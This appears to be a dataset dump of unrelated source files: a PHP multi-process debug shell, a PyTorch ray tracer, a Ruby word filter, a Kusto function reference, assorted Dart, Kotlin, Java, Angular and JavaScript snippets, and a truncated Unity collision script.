text
stringlengths 27
775k
|
|---|
<?php
/**
* Wrap a supplied object in a commandline debug shell. Calls to the objects public methods will be proxied to the shell
* where the developer can poke and prod. Designed to be used in a multi-process application like those created when using
* the Workers feature in a PHP Daemon application. In those cases it's not possible to use a conventional debugger.
*
* Easily add custom commands to the shell, custom prompt language, callbacks that handle interrupts, etc.
*
* @author Shane Harter
*/
class Core_Lib_DebugShell
{
const ABORT = 0;
const CONT = 1;
const CAPTURE = 2;
const INDENT_DEPTH = 6;
/**
* The object that is being proxied by this shell
* @var stdClass
*/
public $object;
/**
* A simple way to toggle debugging on & off
* @var bool
*/
public $debug = true;
/**
* Used to determine which process has access to issue prompts to the debug console.
* @var Resource
*/
private $mutex;
/**
* Shared Memory resource to store settings for this debug shell that can be shared across all processes
* using it.
* @var Resource
*/
public $shm;
public $ftok;
/**
* Does this process currently own the semaphore?
* @var bool
*/
public $mutex_acquired = null;
public $daemon;
/**
* List of methods to exclude from debugging -- will be passed directly to the proxied $object
* @var array
*/
public $blacklist = array();
/**
* Associative array of method names and their corresponding prompt -- If ommitted the method name will be used
* to form a generic prompt.
* @example ['setup', 'Setup the object & connect to the database']
* @var array
*/
public $prompts = array();
/**
* Array of callables
* @var closure[]
*/
private $parsers = array();
/**
* Array of commands and their descriptions
* @var array
*/
private $commands = array();
/**
* Associative array of method names and a callable that will be called if that method is interrupted.
* For example, it could be used to print a special message if a given method is interrupted, or clean up unused resources.
* @var Closure[]
*/
public $interrupt_callables = array();
/**
* It can be helpful to group multiple lines of the same logical event using indentation. But the rules to distinguish
* like-events are unique to each application. You can provide a callback that will be passed the method and args, and
* should return an integer: the number of tab characters to indent the prompt .
* This callable will be passed $method, $args and should return the number of spaces to indent.
* Note: The return value will be mod'd using the INDENT_DEPTH constant to ensure we don't just indent perpetually.
* @var Callable
*/
public $indent_callback;
/**
* The prompt prefix should have any relevant state data. Think about standard bash prompts. You get the cwd, etc, in the prompt.
* This callable will be passed $method, $args and should return the prompt prefix.
* @var Callable
*/
public $prompt_prefix_callback;
public function __construct($object) {
if (!is_object($object))
throw new Exception("DebugShell Failed: You must supply an object to be proxied.");
$this->object = $object;
}
public function __destruct() {
@shm_remove($this->consoleshm);
@shm_detach($this->consoleshm);
@sem_remove($this->mutex);
}
/**
* While the prompt() method can be called from anywhere to simulate "breakpoints" in your code, this class is designed foremost
* as a simple mediator between callers and the given $object instance variable.
*
* The __call method will do the hard work of implementing the proxy and acting on the commands returned from prompt().
*
* @param $method
* @param $args
* @return bool|mixed|null|void
*/
public function __call($method, $args) {
$o = $this->object;
$cb = function() use($o, $method, $args) {
return call_user_func_array(array($o, $method), $args);
};
$interrupt = null;
if (isset($this->interrupt_callables[$method]))
$interrupt = $this->interrupt_callables[$method];
if (!$this->is_breakpoint_active($method))
return $cb();
switch($this->prompt($method, $args)) {
case self::CONT:
return $cb();
case self::CAPTURE:
$return = $cb();
echo "\nReturn Value:";
print_r($return);
echo "\n";
if ($this->prompt(self::CAPTURE, null))
return $return;
break;
}
if(is_callable($interrupt))
return $interrupt();
return null;
}
public function __get($k) {
if (in_array($k, get_object_vars($this->object)))
return $this->object->{$k};
return null;
}
public function __set($k, $v) {
if (in_array($k, get_object_vars($this->object)))
return $this->object->{$k} = $v;
return null;
}
/**
* Setup the debug shell: Attach any shared resources and register any prompts or parsers.
* @return void
*/
public function setup_shell() {
ini_set('display_errors', 0); // Displayed errors won't break the debug console but it will make it more difficult to use. Tail a log file in another shell instead.
$this->ftok = ftok(Core_Daemon::get('filename'), 'D');
$this->mutex = sem_get($this->ftok, 1, 0666, 1);
$this->shm = shm_attach($this->ftok, 64 * 1024, 0666);
$shell = $this;
$object = $this->object;
$daemon = $this->daemon;
$this->prompts[self::CAPTURE] = 'Pass-thru captured return value?';
// Add any default parsers
$parsers = array();
$parsers[] = array(
'regex' => '/^eval (.*)/i',
'command' => 'eval [php]',
'description' => 'Eval the supplied code. Passed to eval() as-is. Any return values will be printed. In this context, $shell, $object and $daemon objects are available',
'closure' => function($matches, $printer) use($shell, $object, $daemon){
$return = @eval($matches[1]);
if ($return === false)
$printer("eval returned false -- possibly a parse error. Check semi-colons, parens, braces, etc.");
elseif ($return !== null)
$printer("eval() returned:" . PHP_EOL . print_r($return, true));
else
echo PHP_EOL;
return false;
}
);
$parsers[] = array(
'regex' => '/^signal (\d+)/i',
'command' => 'skipfor [n]',
'description' => 'Run the daemon (and skip ALL breakpoints) for N seconds, then return to normal break point operation.',
'closure' => function($matches, $printer) {
posix_kill(Core_Daemon::get('parent_pid'), $matches[1]);
$printer("Signal Sent");
}
);
$parsers[] = array(
'regex' => '/^skipfor (\d+)/i',
'command' => 'signal [n]',
'description' => 'Send the n signal to the parent daemon.',
'closure' => function($matches, $printer) use($shell) {
$time = time() + $matches[1];
$shell->debug_state("skip__until", $time);
$printer("Skipping Breakpoints for $matches[1] seconds. Will resume at " . date('H:i:s', $time));
}
);
$this->loadParsers($parsers);
}
/**
* Return a thread-aware monotonically incrementing integer. Optionally supply a $key to cache the integer assignment
* and return that to subsequent requests with the same key.
*
* @param string $key If we've already assigned an integer to this key, return that. Otherwise, assign, cache and return it.
* @return integer
*/
public function increment_indent($key = null) {
$i = 1 + $this->debug_state('indent_incrementor', null, 0);
if ($key === null) {
$this->debug_state('indent_incrementor', $i);
return $i;
}
$map = $this->debug_state('indent_map', null, array());
if (!isset($map[$key])) {
$map[$key] = $i;
$this->debug_state('indent_map', $map);
$this->debug_state('indent_incrementor', $i);
}
return $map[$key];
}
/**
* Add a parser to the queue. Will be evaluated FIFO.
* The parser functions will be passed the method, args
* @param $command
* @param $callable
* @param string $description
*/
public function addParser ($regex, $command, $description, $closure) {
$this->parsers[] = compact('regex', 'command', 'description', 'closure');
}
/**
* Append the given array of parsers to the end of the parser queue
* Array should contain associative array with keys: regex, command, description, closure
* @param array $parsers
* @throws Exception
*/
public function loadParsers (array $parsers) {
$test = array_keys(current($parsers));
$keys = array('regex', 'command', 'description', 'closure');
if ($test != $keys)
throw new Exception("Cannot Load Parser Queue: Invalid array format. Expected Keys: " . implode(', ', $test) . " Given Keys: " . implode(', ', $keys));
$this->parsers = array_merge($this->parsers, $parsers);
}
/**
* Acquire the mutex. If it's acquired elsewhere, method will block until the mutex is acquired.
* Note: this method is not thread-aware. The point of caching the pid the mutex was assigned to
* is to avoid problems where a mutex is acquired, the process forks, and the child thinks IT owns the mutex.
* @return bool
*/
private function mutex_acquire () {
$pid = getmypid();
if ($pid == $this->mutex_acquired)
return true;
if (sem_acquire($this->mutex))
$this->daemon->log("Mutex Granted");
else
$this->daemon->log("Mutex Grant Failed");
//throw new Exception("Cannot acquire mutex: Unknown Error.");
$this->mutex_acquired = $pid;
return true;
}
/**
* Release the mutex
* @return void
*/
private function mutex_release () {
@sem_release($this->mutex);
$this->mutex_acquired = false;
$this->daemon->log('Mutex Released');
}
/**
* Get and Set state variables to share settings for this console across processes
* @param $key
* @param null $value
* @return bool|null
*/
public function debug_state ($key, $value = null, $default = null) {
static $state = false;
$defaults = array(
'parent' => Core_Daemon::get('parent_pid'),
'enabled' => true,
'indent' => true,
'last' => '',
'banner' => true,
'warned' => false,
);
if (shm_has_var($this->shm, 1))
$state = shm_get_var($this->shm, 1);
else
$state = $defaults;
// If the process was kill -9'd we might have settings from last debug session hanging around.. wipe em
if ($state['parent'] != Core_Daemon::get('parent_pid')) {
$state = $defaults;
shm_put_var($this->shm, 1, $state);
}
if ($value === null)
if (isset($state[$key]))
$this->daemon->log("State get $key = " . $state[$key]);
else
$this->daemon->log("State get $key = [$default]");
else
$this->daemon->log("State SET $key=$value");
if ($value === null)
if (isset($state[$key]))
return $state[$key];
else
return $default;
$state[$key] = $value;
return shm_put_var($this->shm, 1, $state);
}
/**
* Determine if a prompt should be displayed. There are several ways to skip/suppress prompts:
*
* 1. Disable debugging.
* 2. Add a given $method to the blacklist at design-time.
* 3. At runtime, you can temporarily add a $method to the blacklist with the "skip" command.
* 4. At runtime, you can temporarily disable ALL prompts for a duration using the "skipfor" command.
*
* @param $method
* @return bool
*/
private function is_breakpoint_active($method) {
$a = !in_array($method, $this->blacklist);
$b = $this->debug_state('enabled');
$c = !$this->debug_state("skip_$method");
$d = $this->debug_state('skip__until') === null || $this->debug_state('skip__until') < time();
return $a && $b && $c && $d;
}
/**
* Display the prompt.
* If a prompt has been added for this $method (either as a closure or a static textual prompt), use it. Otherwise
* use a default prompt.
*
* Supports indentation of the prompt if an indent_callback has been registered. The idea is to visually group
* prompts together at a specific indent level to more easily follow along. It could be something like each process
* has its own indent level, or each prompt relating to a specific task or item could have its own, etc. To do this,
* indent_callback must return an integer to indicate the number of tab chars that will be parsed into the prompt.
*
* Also supports a prefix that can be shared across all prompts by registering a prompt_prefix_callback.
*
* @param $method
* @param $args
* @return string
*/
private function get_text_prompt($method, $args) {
if (isset($this->prompts[$method]))
if (is_callable($this->prompts[$method]))
$prompt = $this->prompts[$method]($method, $args);
else
$prompt = $this->prompts[$method];
if (empty($prompt))
$prompt = sprintf('Call to %s::%s()', get_class($this->object), $method);
$indenter = $this->indent_callback;
if (is_callable($indenter) && $this->debug_state('indent')) {
$indent = $indenter($method, $args);
if (is_numeric($indent) && $indent > 0)
$prompt = str_repeat("\t", $indent % self::INDENT_DEPTH) . $prompt;
}
$prefixer = $this->prompt_prefix_callback;
if (is_callable($prefixer))
$prompt = "[" . $prefixer($method, $args) . "] " . $prompt;
return "$prompt > ";
}
/**
* Print a simple banner when the console starts
*
* @return void
*/
private function print_banner() {
if ($this->debug_state('banner')) {
echo PHP_EOL, 'PHP Daemon - Worker Debug Console';
echo PHP_EOL, 'Use `help` for list of commands', PHP_EOL, PHP_EOL;
$this->debug_state('banner', false);
}
}
/**
* Display a command prompt, block on input from STDIN, then parse and execute the specified commands.
*
* Multiple processes share a single command prompt by accessing a semaphore identified by the current application.
* This method will block the process while it waits for the mutex, and then again while it waits for input on STDIN.
*
* The text of the prompt itself will be written when get_text_prompt() is called. Custom prompts for a given $method
* can be added to the $prompts array.
*
* Several commands are built-in, and additional commands can be added with addParser().
*
* Parsers can either:
* 1. Continue from the prompt.
* 2. Abort from the prompt. Call any interrupt_callable that may be registered for this $method.
* 3. Take some action or perform some activity and then return to the same prompt for additional commands.
*
* @param $method
* @param $args
* @return bool|int|mixed|null
* @throws Exception
*/
public function prompt($method, $args) {
if(!is_resource($this->shm))
return true;
// The single debug shell is shared across the parent and all worker processes. Use a mutex to serialize
// access to the shell. If the mutex isn't owned by this process, this will block until this process acquires it.
$this->mutex_acquire();
if (!$this->is_breakpoint_active($method)) {
$this->mutex_release();
return true;
}
// Pass a simple print-line closure to parsers to use instead of just "echo" or "print"
$printer = function($message, $maxlen = null) {
if (empty($message))
return;
if ($maxlen && strlen($message) > $maxlen) {
$message = substr($message, 0, $maxlen-3) . '...';
}
$message = str_replace(PHP_EOL, PHP_EOL . ' ', $message);
echo " $message\n\n";
};
try {
$this->print_banner();
$pid = getmypid();
$prompt = $this->get_text_prompt($method, $args);
$break = false;
// We have to clear the buffer of any input that occurred in the terminal in the space after they submitted their last
// command and before this new prompt. Otherwise it'll be read from fgets below and probably ruin everything.
stream_set_blocking(STDIN, 0);
while(fgets(STDIN)) continue;
stream_set_blocking(STDIN, 1);
// Commands that set $break=true will continue forward from the command prompt.
// Otherwise it will just do the action (or display an error) and then repeat the prompt
while(!$break) {
echo $prompt;
$input = trim(fgets(STDIN));
$input = preg_replace('/\s+/', ' ', $input);
$matches = false;
$message = '';
// Use the familiar bash !! to re-run the last command
if (substr($input, -2) == '!!')
$input = $this->debug_state('last');
elseif(!empty($input))
$this->debug_state('last', $input);
// Validate the input as an expression
$matches = array();
foreach ($this->parsers as $parser)
if (preg_match($parser['regex'], $input, $matches) == 1) {
$break = $parser['closure']($matches, $printer);
break;
}
if ($matches)
continue;
// If one of the parsers didn't catch the message
// fall through to the built-in commands
switch(strtolower($input)) {
case 'help':
$out = array();
$out[] = 'For the PHP Simple Daemon debugging guide, see: ';
$out[] = 'https://github.com/shaneharter/PHP-Daemon/wiki/Debugging-Workers';
$out[] = '';
$out[] = 'Available Commands:';
$out[] = 'y Step to the next break point';
$out[] = 'n Interrupt';
$out[] = '';
$out[] = 'capture Call the current method and capture its return value. Will print_r the return value and return a prompt.';
$out[] = 'end End the debugging session, continue the daemon as normal.';
$out[] = 'help Print This Help';
$out[] = 'kill Kill the daemon and all of its worker processes.';
$out[] = 'skip Skip this breakpoint from now on.';
$out[] = 'shutdown End Debugging and Gracefully shutdown the daemon after the current loop_interval.';
$out[] = 'trace Print A Stack Trace';;
if (is_callable($this->indent_callback))
$out[] = 'indent [y|n] When turned-on, indentation will be used to group messages from the same call in a column so you can easily match them together.';
$out[] = '';
foreach($this->parsers as $parser)
$out[] = sprintf('%s%s', str_pad($parser['command'], 18, ' ', STR_PAD_RIGHT), $parser['description']);
$out[] = '';
$out[] = '!! Repeat previous command';
$printer(implode(PHP_EOL, $out));
break;
case 'indent y':
$this->debug_state('indent', true);
$printer('Indent enabled');
break;
case 'indent n':
$this->debug_state('indent', false);
$printer('Indent disabled');
break;
case 'show args':
$printer(print_r($args, true));
break;
case 'shutdown':
//$this->daemon->shutdown();
$printer("Shutdown In Progress... Use `end` command to cease debugging until shutdown is complete.");
$break = true;
break;
case 'trace':
$e = new exception();
$printer($e->getTraceAsString());
break;
case 'end':
$this->debug_state('enabled', false);
$break = true;
$printer('Debugging Ended..');
$input = true;
break;
case 'skip':
$this->debug_state("skip_$method", true);
$printer('Breakpoint "' . $method . '" Turned Off..');
$break = true;
$input = true;
break;
case 'kill':
@fclose(STDOUT);
@fclose(STDERR);
@exec('ps -C "php ' . Core_Daemon::get('filename') . '" -o pid= | xargs kill -9 ');
break;
case 'capture':
$backtrace = debug_backtrace();
if ($backtrace[1]['function'] !== '__call' || $method == self::CAPTURE) {
$printer('Cannot capture this :(');
break;
}
$input = self::CAPTURE;
$break = true;
break;
case 'y':
$input = self::CONT;
$break = true;
break;
case 'n':
$input = self::ABORT;
$break = true;
break;
default:
if ($input)
$printer("Unknown Command! See `help` for list of commands.");
}
}
} catch (Exception $e) {
$this->mutex_release();
throw $e;
}
$this->mutex_release();
return $input;
}
}
|
// String includes polyfill
// Why didn't I put this in app.js? Because Showdown's
// style guide sucks. JSCS can't check correct indentation
// for shit.
if (!String.prototype.includes) {
String.prototype.includes = function () {
return String.prototype.indexOf.apply(this, arguments) !== -1;
};
}
module.exports = (function() {
var Poll = {
reset: function(roomId) {
Poll[roomId] = {
question: undefined,
optionList: [],
options: {},
display: '',
topOption: ''
};
},
splint: function(target) {
var parts = target.split(',');
var len = parts.length;
while (len--) {
parts[len] = parts[len].trim();
}
return parts;
}
};
for (var id in Rooms.rooms) {
if (Rooms.rooms[id].type === 'chat' && !Poll[id]) {
Poll[id] = {};
Poll.reset(id);
}
}
return Poll;
})();
|
import torch
from pynif3d.camera import SphereRayTracer
from pynif3d.common.verification import check_equal, check_not_none, check_shapes_match
from pynif3d.log.log_funcs import func_logger
from pynif3d.sampling.ray.secant import SecantRaySampler
from pynif3d.utils.functional import ray_sphere_intersection
class IDRRayTracer(torch.nn.Module):
"""
The IDR ray tracer. Takes ray directions, ray origins + 2D object mask as input and
computes the intersection points with the surface. Also handles the non-convergent
rays.
Usage:
.. code-block:: python
# Assume that an SDF model (torch.nn.Module) is given.
model = IDRRayTracer(sdf_model)
points, z_vals, mask_intersect = model(ray_directions, ray_origins, object_mask)
"""
@func_logger
def __init__(self, sdf_model, **kwargs):
"""
Args:
sdf_model (instance): Instance of an SDF model.
"""
super().__init__()
check_not_none(sdf_model, "sdf_model")
self.sdf_model = sdf_model
self.ray_tracer = SphereRayTracer(sdf_model)
self.ray_sampler = SecantRaySampler(sdf_model)
def forward(self, ray_directions, ray_origins, object_mask):
"""
Args:
ray_directions (torch.Tensor): Tensor containing the ray directions. Its
shape is ``(n_rays, 3)``.
ray_origins (torch.Tensor): Tensor containing the ray origins. Its shape is
``(n_rays, 3)``.
object_mask (torch.Tensor): Boolean tensor containing the object mask for
the given rays. If rays_d[i] intersects the object, object_mask[i] is
marked as True, otherwise as False. Its shape is ``(n_rays,)``.
Returns:
tuple: Tuple containing the sampled points, their corresponding Z values and
point-to-surface-intersection mask.
"""
check_shapes_match(ray_directions, ray_origins, "ray_origins", "ray_directions")
check_equal(ray_origins.shape[-1], 3, "ray_origins.shape[-1]", "3")
rays_d = ray_directions.reshape(-1, 3)
rays_o = ray_origins.reshape(-1, 3)
rays_m = object_mask.reshape(-1)
check_equal(len(rays_m), len(rays_d), "len(rays_m)", "len(rays_d)")
# Prepare the output data.
points_all = torch.zeros_like(rays_d, dtype=torch.float32)
z_vals_all = torch.zeros_like(rays_m, dtype=torch.float32)
network_mask_all = torch.zeros_like(rays_m)
mask_unfinished_all = torch.zeros_like(rays_m)
# Determine which rays will intersect the surface.
z_vals_intersect, mask_intersect = ray_sphere_intersection(rays_d, rays_o)
z_vals_intersect[z_vals_intersect < 0] = 0
if not torch.any(mask_intersect):
return points_all, z_vals_all, network_mask_all
# Compute the intersection between the current ray directions and the spheres
# centered at the origins of the rays. The intersection between a ray and a
# sphere consists of two intersection points (stored in the first channel).
points_tracer, z_vals_tracer, mask_unfinished = self.ray_tracer(
rays_d=rays_d[mask_intersect],
rays_o=rays_o[mask_intersect],
z_vals=z_vals_intersect[:, mask_intersect],
)
zs_min = z_vals_tracer[0]
zs_max = z_vals_tracer[1]
network_mask = zs_min < zs_max
# Discard the second intersection points.
points_tracer = points_tracer[0]
z_vals_tracer = z_vals_tracer[0]
mask_unfinished = mask_unfinished[0]
# Handle the non-convergent rays.
if torch.any(mask_unfinished):
secant_points, secant_z_vals, secant_mask = self.ray_sampler(
rays_d=rays_d[mask_intersect][mask_unfinished],
rays_o=rays_o[mask_intersect][mask_unfinished],
rays_m=rays_m[mask_intersect][mask_unfinished],
zs_min=zs_min[mask_unfinished],
zs_max=zs_max[mask_unfinished],
)
points_tracer[mask_unfinished] = secant_points
z_vals_tracer[mask_unfinished] = secant_z_vals
network_mask[mask_unfinished] = secant_mask
# Update the output data. So far all the computations have been done using the
# points that intersect the spheres.
points_all[mask_intersect] = points_tracer
z_vals_all[mask_intersect] = z_vals_tracer
mask_unfinished_all[mask_intersect] = mask_unfinished
network_mask_all[mask_intersect] = network_mask
if not self.training:
return points_all, z_vals_all, network_mask_all
# Handle the outliers.
mask_i = ~network_mask_all & rays_m & ~mask_unfinished_all
mask_o = ~rays_m & ~mask_unfinished_all
mask = (mask_i | mask_o) & ~mask_intersect
if torch.any(mask):
rays_o_left_out = rays_o[mask]
rays_d_left_out = rays_d[mask]
z_vals_left_out = -torch.sum(rays_d_left_out * rays_o_left_out, dim=-1)
z_vals_all[mask] = z_vals_left_out
points_all[mask] = (
z_vals_left_out[..., None] * rays_d_left_out + rays_o_left_out
)
mask = (mask_i | mask_o) & mask_intersect
if torch.any(mask):
zs_min, zs_max = z_vals_intersect
zs_min[network_mask_all & mask_o] = z_vals_all[network_mask_all & mask_o]
points_min_sdf, z_vals_min_sdf = self.sample_min_sdf_uniform(
rays_d=rays_d[mask],
rays_o=rays_o[mask],
zs_min=zs_min[mask],
zs_max=zs_max[mask],
)
points_all[mask] = points_min_sdf
z_vals_all[mask] = z_vals_min_sdf
return points_all, z_vals_all, network_mask_all
def sample_min_sdf_uniform(self, rays_d, rays_o, zs_min, zs_max, **kwargs):
"""
Uniformly samples points along the ray, in the [zs_min, zs_max] interval, and
selects the ones with the minimum SDF values.
Args:
rays_d (torch.Tensor): Tensor containing the ray directions. Its shape is
``(n_rays, 3)``.
rays_o (torch.Tensor): Tensor containing the ray origins. Its shape is
``(n_rays, 3)``.
zs_min (torch.Tensor): Tensor containing the minimum Z values of the points
that are sampled along the ray. Its shape is ``(n_rays,)``.
zs_max (torch.Tensor): Tensor containing the maximum Z values of the points
that are sampled along the ray. Its shape is ``(n_rays,)``.
kwargs (dict):
- **n_samples** (int): The number of points that are sampled along the
rays. Default value is 100.
- **chunk_size** (int): The size of the chunk of points that is passed
to the SDF model. Default value is 10000.
Returns:
tuple: Tuple containing the samples points (as a torch.Tensor with shape
``(n_rays, 3)``) and corresponding Z values (as a torch.Tensor with
shape ``(n_rays,)``).
"""
n_samples = kwargs.get("n_samples", 100)
chunk_size = kwargs.get("chunk_size", 10000)
z_vals = torch.rand(n_samples, device=rays_d.device)
z_vals = z_vals[None, ...] * (zs_max - zs_min)[..., None] + zs_min[..., None]
points = z_vals[..., None] * rays_d[..., None, :] + rays_o[..., None, :]
chunks = torch.split(points.reshape(-1, 3), chunk_size, dim=0)
sdf_vals = torch.cat([self.sdf_model(p) for p in chunks]).reshape(-1, n_samples)
indices = torch.argmin(sdf_vals, dim=-1)
points = points[torch.arange(len(rays_d)), indices]
z_vals = z_vals[torch.arange(len(rays_d)), indices]
return points, z_vals
|
module FullTextSearch
class SimilarWordsFilter
attr_accessor :cosine_threshold
attr_accessor :engine
attr_accessor :sentence_piece_space
def initialize
@cosine_threshold = 0.99
@engine = nil
@sentence_piece_space = "▁"
end
def run(records)
expansions = {}
records.each do |record|
source = normalize_word(record["source"])
destination = normalize_word(record["destination"])
next unless target?(source, destination, record)
(expansions[source] ||= []) << destination
(expansions[destination] ||= []) << source
end
generate_records(expansions)
end
private
def normalize_word(word)
word.
gsub(@sentence_piece_space, " ").
unicode_normalize(:nfkc).
downcase.
strip
end
def ignore_character_only?(word)
/\A[\p{Number}\p{Punctuation}\p{Symbol}]*\z/.match?(word)
end
def multibyte_word?(word)
not word.ascii_only?
end
def sub_word?(word1, word2)
word1.include?(word2) or word2.include?(word1)
end
JAPANESE_PARTICLES = [
"が",
"で",
"と",
"に",
"の",
"は",
"も",
"を",
]
def with_japanese_particle?(word)
JAPANESE_PARTICLES.any? do |particle|
word.start_with?(particle) or word.end_with?(particle)
end
end
def target?(source, destination, record)
return false if source.include?(" ")
return false if destination.include?(" ")
return false if source.size == 1
return false if destination.size == 1
return false if ignore_character_only?(source)
return false if ignore_character_only?(destination)
if multibyte_word?(source) or multibyte_word?(destination)
return false if sub_word?(source, destination)
end
# TODO: Very heuristic. Remove me.
return false if with_japanese_particle?(source)
return false if with_japanese_particle?(destination)
cosine = record["cosine"]
if cosine and cosine < @cosine_threshold
return false
end
if @engine and record["engine"] != @engine
return false
end
true
end
def generate_records(expansions)
records = []
expansions.keys.sort.each do |source|
destinations = expansions[source]
destinations = ([source] + destinations).uniq.sort
next if destinations.size == 1
destinations.each do |destination|
record = {
"source" => source,
"destination" => destination,
}
records << record
end
end
records
end
end
end
|
exports.run = function (req, res) {
fusker.blacklist.push({ip: req.connection.remoteAddress, date: new Date()});
};
|
---
title: series_fill_const() - Azure Data Explorer
description: This article describes series_fill_const() in Azure Data Explorer.
services: data-explorer
author: orspod
ms.author: orspodek
ms.reviewer: alexans
ms.service: data-explorer
ms.topic: reference
ms.date: 02/13/2020
---
# series_fill_const()
Replaces missing values in a series with a specified constant value.
Takes an expression containing dynamic numerical array as input, replaces all instances of missing_value_placeholder with the specified constant_value and returns the resulting array.
## Syntax
`series_fill_const(`*x*`, `*constant_value*`[,` *missing_value_placeholder*`])`
* Will return series *x* with all instances of *missing_value_placeholder* replaced with *constant_value*.
## Arguments
* *x*: dynamic array scalar expression that is an array of numeric values.
* *constant_value*: the value replacing missing values.
* *missing_value_placeholder*: optional parameter that specifies a placeholder for a missing value to be replaced. Default value is `double`(*null*).
**Notes**
* If you create the series using the [make-series](make-seriesoperator.md) operator, it fills in the missing values using default 0. Alternatively, you can specify a constant value to fill in by specifying `default = ` *DefaultValue* in the make-series statement.
```kusto
make-series num=count() default=-1 on TimeStamp from ago(1d) to ago(1h) step 1h by Os, Browser
```
* To apply any interpolation functions after [make-series](make-seriesoperator.md), specify *null* as a default value:
```kusto
make-series num=count() default=long(null) on TimeStamp from ago(1d) to ago(1h) step 1h by Os, Browser
```
* The *missing_value_placeholder* can be of any type, which will be converted to actual element types. As such, either `double`(*null*), `long`(*null*) or `int`(*null*) have the same meaning.
* The function preserves original type of the array elements.
## Example
<!-- csl: https://help.kusto.windows.net/Samples -->
```kusto
let data = datatable(`arr`: dynamic)
[
dynamic([111,null,36,41,23,null,16,61,33,null,null])
];
data
| project arr,
fill_const1 = series_fill_const(arr, 0.0),
fill_const2 = series_fill_const(arr, -1)
```
|`arr`|`fill_const1`|`fill_const2`|
|---|---|---|
|[111,null,36,41,23,null,16,61,33,null,null]|[111,0.0,36,41,23,0.0,16,61,33,0.0,0.0]|[111,-1,36,41,23,-1,16,61,33,-1,-1]|
|
class ChatRequestModel {
static messageSendRequestBody({var userId, var message}) {
final Map<String, dynamic> data = new Map<String, dynamic>();
data['Chat[to_id]'] = userId;
data['Chat[message]'] = message;
return data;
}
}
|
package com.kangraoo.basektlib.tools.glide
import android.content.Context
import com.bumptech.glide.Glide
import com.bumptech.glide.GlideBuilder
import com.bumptech.glide.Registry
import com.bumptech.glide.annotation.GlideModule
import com.bumptech.glide.integration.okhttp3.OkHttpUrlLoader
import com.bumptech.glide.load.DecodeFormat
import com.bumptech.glide.load.engine.bitmap_recycle.LruBitmapPool
import com.bumptech.glide.load.engine.cache.DiskLruCacheFactory
import com.bumptech.glide.load.engine.cache.LruResourceCache
import com.bumptech.glide.load.model.GlideUrl
import com.bumptech.glide.module.AppGlideModule
import com.bumptech.glide.request.RequestOptions
import com.kangraoo.basektlib.exception.LibPermissionException
import com.kangraoo.basektlib.exception.LibStorageException
import com.kangraoo.basektlib.tools.log.ULog
import com.kangraoo.basektlib.tools.okhttp.UOkHttp
import com.kangraoo.basektlib.tools.store.filestorage.StorageType
import com.kangraoo.basektlib.tools.store.filestorage.UStorage
import com.kangraoo.basektlib.tools.store.filestorage.UStorage.getDirectoryByDirType
import com.kangraoo.basektlib.tools.store.filestorage.UStorage.storageCheck
import java.io.InputStream
/**
* Created by hyy on 2018/09/17.
*/
@GlideModule
class SGlideModule : AppGlideModule() {
var cacheSize = 100L * 1024L * 1024L
override fun applyOptions(
context: Context,
builder: GlideBuilder
) {
val maxMemory = Runtime.getRuntime().maxMemory().toInt() // 获取系统分配给应用的总内存大小
val memoryCacheSize = maxMemory / 8 // 设置图片内存缓存占用八分之一
// 设置内存缓存大小
builder.setMemoryCache(LruResourceCache(memoryCacheSize.toLong()))
if (UStorage.initStorage) {
try {
storageCheck(StorageType.TYPE_IMAGE)
var diskLruCacheFactory = DiskLruCacheFactory(
getDirectoryByDirType(StorageType.TYPE_IMAGE),
cacheSize
)
builder.setDiskCache(diskLruCacheFactory)
} catch (e: LibStorageException) {
ULog.e(e, e.message)
} catch (e: LibPermissionException) {
ULog.e(e, e.message)
}
}
// 设置图片解码格式
builder.setDefaultRequestOptions(RequestOptions().format(DecodeFormat.PREFER_ARGB_8888))
// builder.setDecodeFormat(DecodeFormat.PREFER_ARGB_8888);
// 设置BitmapPool缓存内存大小
builder.setBitmapPool(LruBitmapPool(memoryCacheSize.toLong()))
}
override fun registerComponents(
context: Context,
glide: Glide,
registry: Registry
) {
registry.replace(
GlideUrl::class.java,
InputStream::class.java,
OkHttpUrlLoader.Factory(UOkHttp.instance.imageOkhttp())
)
}
}
|
package org.struckture.handlers;
import org.struckture.base.annotations.StruckField;
import java.lang.annotation.Annotation;
import java.nio.ByteBuffer;
import java.util.Set;
/**
* Byte Array Handler.
*/
public class ByteArrayHandler extends ReversibleHandler<byte[]> {
private int size = 0;
@Override
public void init(Set<Annotation> annotations) {
super.init(annotations);
StruckField struckField = getAnnotation(StruckField.class);
size = struckField.size();
}
@Override
public int getSize() {
return size;
}
private static void reverse(byte[] data) {
int left = 0;
int right = data.length - 1;
while (left < right) {
// swap the values at the left and right indices
byte temp = data[left];
data[left] = data[right];
data[right] = temp;
// move the left and right index pointers in toward the center
left++;
right--;
}
}
@Override
public byte[] getValue(ByteBuffer byteBuffer) {
byte[] result = new byte[size];
byteBuffer.get(result);
if (isReversed()) {
reverse(result);
}
return result;
}
}
|
package academy.pocu.comp3500.lab9.data;
public final class VideoClip {
private final int startTime;
private final int endTime;
public VideoClip(int start, int end) {
startTime = start;
endTime = end;
}
public int getStartTime() {
return startTime;
}
public int getEndTime() {
return endTime;
}
}
|
import { Component, Input } from '@angular/core';
import { SpectatorPipe, createPipeFactory } from '@ngneat/spectator';
import { AveragePipe } from './average.pipe';
import { StatsService } from './stats.service';
@Component({
template: `
<div>{{ prop | avg }}</div>
`
})
class CustomHostComponent {
@Input() public prop: number[] = [1, 2, 3];
}
describe('AveragePipe', () => {
let spectator: SpectatorPipe<AveragePipe>;
const createPipe = createPipeFactory({
pipe: AveragePipe,
host: CustomHostComponent,
providers: [StatsService]
});
it('should compute the average of a given list of numbers', () => {
spectator = createPipe();
expect(spectator.element).toHaveText('2');
});
it('should result to 0 when list of numbers is empty', () => {
spectator = createPipe({
hostProps: {
prop: []
}
});
expect(spectator.element).toHaveText('0');
});
it('should delegate the calculation to the service', () => {
const avg = () => 42;
const provider = { provide: StatsService, useValue: { avg } };
spectator = createPipe({
providers: [provider]
});
expect(spectator.element).toHaveText('42');
});
});
|
using UnityEngine;
using System.Collections;
using System;
public class BreakableObjectCollision : CollisionReceiver {
public Transform builtWall;
public Transform destroyedWall;
public bool wallDestroyed = false;
protected new void Awake() {
base.Awake();
if (!builtWall) {
builtWall = transform;
}
SetWallVisibility();
}
public override void OnCollideEnemyFaction(ProxyCollision other) {
base.OnCollideEnemyFaction(other);
wallDestroyed = !wallDestroyed;
SetWallVisibility();
}
private void SetWallVisibility() {
// break a piece away
if (wallDestroyed) {
builtWall.GetComponent<BoxCollider2D>().enabled = false;
builtWall.GetComponent<SpriteRenderer>().enabled = false;
